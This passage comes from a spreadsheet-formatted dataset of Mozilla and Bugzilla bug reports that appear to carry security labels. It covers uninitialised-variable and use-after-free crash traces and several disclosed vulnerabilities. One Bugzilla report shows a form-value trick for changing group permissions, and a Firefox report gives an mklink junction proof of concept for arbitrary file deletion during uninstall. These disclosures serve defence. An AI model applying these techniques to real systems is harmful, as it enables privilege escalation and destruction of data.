==30518==    by 0x6712C1A: js::IndirectProxyHandler::call(JSContext*, JSObject*, unsigned int, JS::Value*) (jsproxy.cpp:456)
==30518==    by 0x67820EB: js::DirectWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) (jswrapper.cpp:390)
==30518==    by 0x6784837: js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) (jswrapper.cpp:722)
==30518==    by 0x67184C3: js::Proxy::call(JSContext*, JSObject*, unsigned int, JS::Value*) (jsproxy.cpp:2478)
==30518==    by 0x671851A: proxy_Call(JSContext*, unsigned int, JS::Value*) (jsproxy.cpp:3038)
==30518==    by 0x66D2AB8: js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:364)
==30518==    by 0x66C4414: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2369)
==30518==    by 0x66D18AC: js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) (jsinterp.cpp:324)
==30518==    by 0x66D296F: js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) (jsinterp.cpp:379)
==30518==    by 0x66D3037: js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) (jsinterp.h:109)
==30518==    by 0x6649E05: JS_CallFunctionValue (jsapi.cpp:5901)
==30518==    by 0x538E6B2: nsJSContext::CallEventHandler(nsISupports*, JSObject*, JSObject*, nsIArray*, nsIVariant**) (nsJSEnvironment.cpp:1914)
==30518==    by 0x542F123: nsJSEventListener::HandleEvent(nsIDOMEvent*) (nsJSEventListener.cpp:212)
==30518==    by 0x51DC9B6: nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) (nsEventListenerManager.cpp:868)
==30518==    by 0x51DD09A: nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) (nsEventListenerManager.cpp:941)
==30518==    by 0x51FF9A0: nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) (nsEventListenerManager.h:144)
==30518==    by 0x137161F7: ???
==30518==  Uninitialised value was created by a stack allocation
==30518==    at 0x5B8F520: nsMsgDBView::GetInsertIndexHelper(nsIMsgDBHdr*, nsTArray&lt;unsigned int, nsTArrayDefaultAllocator&gt;&amp;, nsCOMArray&lt;nsIMsgFolder&gt;*, int, int) (nsMsgDBView.cpp:5198)
==30518==
Observation:
Local variable fieldType is not initialized, but is supposed to be set
by GetFieldTypeAndLenForSort();
However, checking GetFieldTypeAndLenForSort() in the same file reveals
that there is an error path in which the third argument is not set and
the function returns NS_ERROR_UNEXPECTED.
In the code below quoted from nsMsgDBView.cpp, the return value is not
checked at all, and thus the third argument fieldType is undefined,
but unnoticed. So the uninitialized fieldType is referenced in the
switch() statement that follows.
Clearly something is wrong here.
 5195	nsMsgViewIndex nsMsgDBView::GetInsertIndexHelper(nsIMsgDBHdr *msgHdr, nsTArray&lt;nsMsgKey&gt; &amp;keys,
 5196	                                                 nsCOMArray&lt;nsIMsgFolder&gt; *folders,
 5197	                                                 nsMsgViewSortOrderValue sortOrder, nsMsgViewSortTypeValue sortType)
 5198	{
 5199	  nsMsgViewIndex highIndex = keys.Length();
 5200	  nsMsgViewIndex lowIndex = 0;
 5201	  IdKeyPtr EntryInfo1, EntryInfo2;
 5202	  EntryInfo1.key = nullptr;
 5203	  EntryInfo2.key = nullptr;
 5204	
 5205	  nsresult rv;
 5206	  uint16_t  maxLen;
 5207	  eFieldType fieldType;
 5208	  rv = GetFieldTypeAndLenForSort(sortType, &amp;maxLen, &amp;fieldType);
 5209	  const void *pValue1 = &amp;EntryInfo1, *pValue2 = &amp;EntryInfo2;
 5210	
 5211	  int (* comparisonFun) (const void *pItem1, const void *pItem2, void *privateData) = nullptr;
 5212	  int retStatus = 0;
 5213	  msgHdr-&gt;GetMessageKey(&amp;EntryInfo1.id);
 5214	  msgHdr-&gt;GetFolder(&amp;EntryInfo1.folder);
 5215	  EntryInfo1.folder-&gt;Release();
 5216	  //check if a custom column handler exists. If it does then grab it and pass it in
 5217	  //to either GetCollationKey or GetLongField
 5218	  nsIMsgCustomColumnHandler* colHandler = GetCurColumnHandlerFromDBInfo();
 5219	
 5220	  viewSortInfo comparisonContext;
 5221	  comparisonContext.view = this;
 5222	  comparisonContext.isSecondarySort = false;
 5223	  comparisonContext.ascendingSort = (sortOrder == nsMsgViewSortOrder::ascending);
 5224	  rv = EntryInfo1.folder-&gt;GetMsgDatabase(&amp;comparisonContext.db);
 5225	  NS_ENSURE_SUCCESS(rv, highIndex);
 5226	  comparisonContext.db-&gt;Release();
 5227	  switch (fieldType)
 5228	  {
The full log is in bug 803816.
(There could be a security implication since use of uninitialized variable led to many exploits in other software packages before. So I am setting Security status just in case. Please reset it is fixed or is not quite security-related.)</t>
        </is>
      </c>
      <c r="X1581" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1582">
      <c r="A1582" t="n">
        <v>315339</v>
      </c>
      <c r="B1582" t="inlineStr">
        <is>
          <t>2005-11-06 18:00:22 -0800</t>
        </is>
      </c>
      <c r="C1582" t="inlineStr">
        <is>
          <t>User::match_field() now leaves fields undefined instead of as empty strings when no value is passed</t>
        </is>
      </c>
      <c r="D1582" t="inlineStr">
        <is>
          <t>2005-11-23 02:59:58 -0800</t>
        </is>
      </c>
      <c r="E1582" t="n">
        <v>1</v>
      </c>
      <c r="F1582" t="n">
        <v>1</v>
      </c>
      <c r="G1582" t="n">
        <v>4</v>
      </c>
      <c r="H1582" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1582" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1582" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1582" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L1582" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1582" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1582" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1582" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1582" t="inlineStr"/>
      <c r="Q1582" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1582" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1582" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T1582" t="n">
        <v>1</v>
      </c>
      <c r="U1582" t="n">
        <v>0</v>
      </c>
      <c r="V1582" t="n">
        <v>14</v>
      </c>
      <c r="W1582" t="inlineStr">
        <is>
          <t>2.18.4, User.pm, match_field():
        $vars-&gt;{'form'}-&gt;{$field}  = '';
2.20 and above, same function:
        # When we add back in values later, it matters that we delete
        # the param here, and not set it to '', so that we will add
        # things to an empty list, and not to a list containing one
        # empty string
        $cgi-&gt;delete($field);
The consequence of this change is that if a field passed to User::match_field is empty, 2.20 and above makes it undefined, while 2.18.4 leave it as an empty string. More precisely, a test later in the caller (e.g. process_bug.cgi when checking the QA contact) of the form "if defined($cgi-&gt;param('qa_contact'))" returns false instead of true when no QA contact is given. Among other, this prevents us from deleting the QA contact. Maybe there are other (hidden) regressions.
The right fix is to set the field back to '' if the field is empty.</t>
        </is>
      </c>
      <c r="X1582" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1583">
      <c r="A1583" t="n">
        <v>555018</v>
      </c>
      <c r="B1583" t="inlineStr">
        <is>
          <t>2010-03-25 12:24:14 -0700</t>
        </is>
      </c>
      <c r="C1583" t="inlineStr">
        <is>
          <t>initialize nsChildView plugin ports</t>
        </is>
      </c>
      <c r="D1583" t="inlineStr">
        <is>
          <t>2015-10-16 11:49:37 -0700</t>
        </is>
      </c>
      <c r="E1583" t="n">
        <v>1</v>
      </c>
      <c r="F1583" t="n">
        <v>1</v>
      </c>
      <c r="G1583" t="n">
        <v>3</v>
      </c>
      <c r="H1583" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1583" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1583" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K1583" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1583" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1583" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1583" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1583" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1583" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q1583" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1583" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1583" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T1583" t="n">
        <v>1</v>
      </c>
      <c r="U1583" t="n">
        <v>0</v>
      </c>
      <c r="V1583" t="n">
        <v>9</v>
      </c>
      <c r="W1583" t="inlineStr">
        <is>
          <t>Created attachment 434946
fix v1.0
We should initialize nsChildView plugin ports.</t>
        </is>
      </c>
      <c r="X1583" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1584">
      <c r="A1584" t="n">
        <v>1166924</v>
      </c>
      <c r="B1584" t="inlineStr">
        <is>
          <t>2015-05-20 14:07:48 -0700</t>
        </is>
      </c>
      <c r="C1584" t="inlineStr">
        <is>
          <t>Use After Free in CanonicalizeXPCOMParticipant</t>
        </is>
      </c>
      <c r="D1584" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:15 -0700</t>
        </is>
      </c>
      <c r="E1584" t="n">
        <v>1</v>
      </c>
      <c r="F1584" t="n">
        <v>1</v>
      </c>
      <c r="G1584" t="n">
        <v>3</v>
      </c>
      <c r="H1584" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1584" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1584" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K1584" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1584" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1584" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1584" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1584" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1584" t="inlineStr">
        <is>
          <t>[asan][adv-main39+][adv-esr38.1+][adv-esr31.8+]</t>
        </is>
      </c>
      <c r="Q1584" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1584" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1584" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T1584" t="n">
        <v>1</v>
      </c>
      <c r="U1584" t="n">
        <v>0</v>
      </c>
      <c r="V1584" t="n">
        <v>29</v>
      </c>
      <c r="W1584" t="inlineStr">
        <is>
          <t>Using XMLHttpRequest in shared workers can trigger Use After Free.
Firefox version: 41.0a1 (2015-05-19)
Run the test case with local built Firefox in Visual Studio, it crashes in CanonicalizeXPCOMParticipant():
First-chance exception at 0x0F1969CD (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x5A5A5A5A.
Unhandled exception at 0x0F1969CD (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x5A5A5A5A.
The 0x5A5A5A5A memory pattern indicates a use after free.
Variables:
-		&amp;out	0x1acff7ec {0x00000000 &lt;NULL&gt;}	nsISupports * *
+			0x00000000 &lt;NULL&gt;	nsISupports *
-		aIn	0x09c02920 {...}	nsISupports *
+		__vfptr	0x5a5a5a5a {???, ???, ???}	void * *
+		out	0x00000000 &lt;NULL&gt;	nsISupports *
The call stack:
&gt;	xul.dll!CanonicalizeXPCOMParticipant(nsISupports * aIn) Line 931	C++
 	xul.dll!CCGraphBuilder::NoteXPCOMChild(nsISupports * aChild) Line 2332	C++
 	xul.dll!mozilla::CycleCollectedJSRuntime::NoteGCThingXPCOMChildren(const js::Class * aClasp, JSObject * aObj, nsCycleCollectionTraversalCallback &amp; aCb) Line 631	C++
 	xul.dll!mozilla::CycleCollectedJSRuntime::TraverseGCThing(mozilla::CycleCollectedJSRuntime::TraverseSelect aTs, JS::GCCellPtr aThing, nsCycleCollectionTraversalCallback &amp; aCb) Line 666	C++
 	xul.dll!mozilla::JSGCThingParticipant::Traverse(void * aPtr, nsCycleCollectionTraversalCallback &amp; aCb) Line 354	C++
 	xul.dll!CCGraphBuilder::BuildGraph(js::SliceBudget &amp; aBudget) Line 2239	C++
 	xul.dll!nsCycleCollector::MarkRoots(js::SliceBudget &amp; aBudget) Line 2839	C++
 	xul.dll!nsCycleCollector::Collect(ccType aCCType, js::SliceBudget &amp; aBudget, nsICycleCollectorListener * aManualListener, bool aPreferShorterSlices) Line 3612	C++
 	xul.dll!nsCycleCollector_collect(nsICycleCollectorListener * aManualListener) Line 4099	C++
 	xul.dll!`anonymous namespace'::WorkerJSRuntime::CustomGCCallback(JSGCStatus aStatus) Line 1021	C++
 	xul.dll!mozilla::CycleCollectedJSRuntime::OnGC(JSGCStatus aStatus) Line 1263	C++
 	xul.dll!mozilla::CycleCollectedJSRuntime::GCCallback(JSRuntime * aRuntime, JSGCStatus aStatus, void * aData) Line 758	C++
 	xul.dll!js::gc::GCRuntime::collect(bool incremental, js::SliceBudget budget, JS::gcreason::Reason reason) Line 6189	C++
 	xul.dll!js::gc::GCRuntime::gc(JSGCInvocationKind gckind, JS::gcreason::Reason reason) Line 6246	C++
 	xul.dll!js::DestroyContext(JSContext * cx, js::DestroyContextMode mode) Line 187	C++
 	xul.dll!JS_DestroyContext(JSContext * cx) Line 730	C++
 	xul.dll!`anonymous namespace'::WorkerThreadPrimaryRunnable::Run() Line 2823	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 866	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 265	C++
 	xul.dll!mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate * aDelegate) Line 355	C++
 	xul.dll!MessageLoop::RunInternal() Line 234	C++
 	xul.dll!MessageLoop::RunHandler() Line 227	C++
 	xul.dll!MessageLoop::Run() Line 201	C++
 	xul.dll!nsThread::ThreadFunc(void * aArg) Line 364	C++
 	nss3.dll!_PR_NativeRunThread(void * arg) Line 397	C
 	nss3.dll!pr_root(void * arg) Line 90	C
 	[External Code]	
 	[Frames below may be incorrect and/or missing, no symbols loaded for msvcr120.dll]</t>
        </is>
      </c>
      <c r="X1584" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1585">
      <c r="A1585" t="n">
        <v>42337</v>
      </c>
      <c r="B1585" t="inlineStr">
        <is>
          <t>2000-06-13 05:03:26 -0700</t>
        </is>
      </c>
      <c r="C1585" t="inlineStr">
        <is>
          <t>More visual when encountering errors in attaching files</t>
        </is>
      </c>
      <c r="D1585" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E1585" t="n">
        <v>1</v>
      </c>
      <c r="F1585" t="n">
        <v>1</v>
      </c>
      <c r="G1585" t="n">
        <v>4</v>
      </c>
      <c r="H1585" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1585" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1585" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K1585" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1585" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1585" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1585" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1585" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1585" t="inlineStr"/>
      <c r="Q1585" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R1585" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1585" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1585" t="n">
        <v>1</v>
      </c>
      <c r="U1585" t="n">
        <v>0</v>
      </c>
      <c r="V1585" t="n">
        <v>12</v>
      </c>
      <c r="W1585" t="inlineStr">
        <is>
          <t>If you fx forget to fill out the file type when attaching a file to bugzilla, 
bugzilla only shows a small error.
I really like the "normal" big red error message when forgetting to fill out 
required fields.
Please implement this for the "attach file" dialog too.</t>
        </is>
      </c>
      <c r="X1585" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1586">
      <c r="A1586" t="n">
        <v>727303</v>
      </c>
      <c r="B1586" t="inlineStr">
        <is>
          <t>2012-02-14 16:43:22 -0800</t>
        </is>
      </c>
      <c r="C1586" t="inlineStr">
        <is>
          <t>window.fullScreen can be set by untrusted content but does not check for permission or show escape UI</t>
        </is>
      </c>
      <c r="D1586" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1586" t="n">
        <v>1</v>
      </c>
      <c r="F1586" t="n">
        <v>1</v>
      </c>
      <c r="G1586" t="n">
        <v>3</v>
      </c>
      <c r="H1586" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1586" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1586" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1586" t="inlineStr">
        <is>
          <t>9 Branch</t>
        </is>
      </c>
      <c r="L1586" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1586" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1586" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1586" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1586" t="inlineStr">
        <is>
          <t>[sg:moderate][qa!]</t>
        </is>
      </c>
      <c r="Q1586" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1586" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1586" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T1586" t="n">
        <v>1</v>
      </c>
      <c r="U1586" t="n">
        <v>0</v>
      </c>
      <c r="V1586" t="n">
        <v>24</v>
      </c>
      <c r="W1586" t="inlineStr">
        <is>
          <t>Before the mozRequestFullscreen API was enabled, window.fullScreen was read-only for untrusted content.
Now that the DOM fullscreen API is enabled, window.fullScreen is writeable by untrusted content.  This is a side-effect of this patch from bug 545812:
https://hg.mozilla.org/mozilla-central/rev/f212867dce42#l8.12
This is dangerous because window.fullScreen does not include mozRequestFullscreen's security mechanisms (e.g. IsHandlingUserInput check, popup notification, escape keys).  It could be used in a UI spoofing attack.
I think this change was unintentional, and the correct solution is to keep window.fullScreen read-only for untrusted content.  Content can use the new DOM fullscreen API instead.</t>
        </is>
      </c>
      <c r="X1586" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1587">
      <c r="A1587" t="n">
        <v>1167489</v>
      </c>
      <c r="B1587" t="inlineStr">
        <is>
          <t>2015-05-21 19:58:21 -0700</t>
        </is>
      </c>
      <c r="C1587" t="inlineStr">
        <is>
          <t>"Spy in the Sandbox" - Security issue related to High Resolution Time API</t>
        </is>
      </c>
      <c r="D1587" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:27 -0700</t>
        </is>
      </c>
      <c r="E1587" t="n">
        <v>1</v>
      </c>
      <c r="F1587" t="n">
        <v>1</v>
      </c>
      <c r="G1587" t="n">
        <v>3</v>
      </c>
      <c r="H1587" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1587" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1587" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1587" t="inlineStr">
        <is>
          <t>34 Branch</t>
        </is>
      </c>
      <c r="L1587" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1587" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1587" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1587" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1587" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q1587" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1587" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1587" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T1587" t="n">
        <v>1</v>
      </c>
      <c r="U1587" t="n">
        <v>0</v>
      </c>
      <c r="V1587" t="n">
        <v>42</v>
      </c>
      <c r="W1587" t="inlineStr">
        <is>
          <t>Created attachment 8609163
spyinthesandbox-ccs15.pdf (draft of technical paper about the problem)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/8.0.6 Safari/600.6.3
Steps to reproduce:
My name is Yossi and I’m a post-doc at Columbia University’s Network Security Lab.  We’ve recently published a report describing a new Javascript-based network attack.  Our attack lets a malicious website learn a surprising amount of personal information about an innocent user, and is largely based upon repeated calls to performance.now() as a measurement method.
Here is a proof of concept that works on Firefox 34 and later for Mac OS and Linux:
http://s.codepen.io/yossioren/debug/ba94a14dd5942fda5db1a3e70809181d?
From our testing it is very apparent that somewhat reducing the resolution of performance.now() will make the attack much more difficult. We noticed that various browser vendors implement the call with different precisions, with Firefox for Linux and MacOS going down to the single nanosecond.  Our attack as described becomes very difficult to launch once the resolution of performance.now() is upper-bounded to 5 thousandths of a millisecond.
Assuming there is not too much of a usability loss (to games, music, VR, etc) if this resolution is upper-bounded, perhaps you should look at changing your implementation.  We’re also in touch with the relevant parties at the W3C to modify the standard accordingly.
I would welcome answering any questions or concerns you may have.  We can have a phone call / teleconf if it’s easier for you.</t>
        </is>
      </c>
      <c r="X1587" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1588">
      <c r="A1588" t="n">
        <v>108821</v>
      </c>
      <c r="B1588" t="inlineStr">
        <is>
          <t>2001-11-06 23:57:54 -0800</t>
        </is>
      </c>
      <c r="C1588" t="inlineStr">
        <is>
          <t>[security] users with blessgroupset!= 0 can change any groupset</t>
        </is>
      </c>
      <c r="D1588" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E1588" t="n">
        <v>1</v>
      </c>
      <c r="F1588" t="n">
        <v>1</v>
      </c>
      <c r="G1588" t="n">
        <v>4</v>
      </c>
      <c r="H1588" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1588" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1588" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K1588" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L1588" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1588" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1588" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1588" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1588" t="inlineStr">
        <is>
          <t>applied to 2.14.1</t>
        </is>
      </c>
      <c r="Q1588" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1588" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1588" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1588" t="n">
        <v>1</v>
      </c>
      <c r="U1588" t="n">
        <v>0</v>
      </c>
      <c r="V1588" t="n">
        <v>17</v>
      </c>
      <c r="W1588" t="inlineStr">
        <is>
          <t>Simply change the value of one of the form elements in editusers.pl to something
like:
value="-$fudge+9223372036854775807"
You can find out the value to plug in for $fudge by entering a bogus value, and
looking at the sql error. Stuff may be on the right, too, so take that into account.
We don't validate the entries against the blessgroupset, and we just read in the
raw values anyway.</t>
        </is>
      </c>
      <c r="X1588" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1589">
      <c r="A1589" t="n">
        <v>1824420</v>
      </c>
      <c r="B1589" t="inlineStr">
        <is>
          <t>2023-03-24 10:34:46 -0700</t>
        </is>
      </c>
      <c r="C1589" t="inlineStr">
        <is>
          <t>Firefox arbitrary file delete vulnerability</t>
        </is>
      </c>
      <c r="D1589" t="inlineStr">
        <is>
          <t>2024-09-18 13:31:54 -0700</t>
        </is>
      </c>
      <c r="E1589" t="n">
        <v>1</v>
      </c>
      <c r="F1589" t="n">
        <v>1</v>
      </c>
      <c r="G1589" t="n">
        <v>3</v>
      </c>
      <c r="H1589" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1589" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1589" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K1589" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1589" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1589" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1589" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main116+] [adv-ESR115.1+]</t>
        </is>
      </c>
      <c r="Q1589" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1589" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1589" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T1589" t="n">
        <v>0</v>
      </c>
      <c r="U1589" t="n">
        <v>0</v>
      </c>
      <c r="V1589" t="n">
        <v>39</v>
      </c>
      <c r="W1589" t="inlineStr">
        <is>
          <t>## Firefox arbitrary file detete vuln
## Basic Info
- Software Name: Firefox for Windows
- Software Version：111.0.1
- Test OS System：Windows 21H2 (19044.1826)
- Vuln Influence：Arbitrary File Delete，Local Privilege Escalation
- CWE：CWE-1386
## Vuln Analyse
After installing Firefox on Windows, a path similar to C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B will be created in the operating system. When an administrator uninstalls Firefox, the uninstall program will recursively delete all files and folders under this path.
- Problem 1：The permission of directory C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B allow all user in Users group add file and directory in it.
```
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates&gt;icacls E7CF176E110C211B
E7CF176E110C211B BUILTIN\Users:(I)(OI)(CI)(F)
                 BUILTIN\Administrators:(I)(OI)(CI)(F)
                 NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
```
- Problem 2：On Windows, the recursive deletion feature can be exploited using symbolic links for attacks. For example, by creating a junction link for C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B\poc and other paths, arbitrary file deletion can be achieved.
## Proof Of Concept
We can finally get a system shell by trick listing here：https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks.
In this part, we only proof the arbitrary file delete vuln.
1. an low privilege user attacker create a junction between C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B\poc and C:\Users\admin\Desktop
   ```
   mklink /J C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B\poc C:\Users\admin\Desktop
   ```
2. admin uninstall firefox
3. files in C:\Users\admin\Desktop will be deleted.</t>
        </is>
      </c>
      <c r="X1589" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1590">
      <c r="A1590" t="n">
        <v>871099</v>
      </c>
      <c r="B1590" t="inlineStr">
        <is>
          <t>2013-05-10 22:04:08 -0700</t>
        </is>
      </c>
      <c r="C1590" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsIDocument::GetRootElement</t>
        </is>
      </c>
      <c r="D1590" t="inlineStr">
        <is>
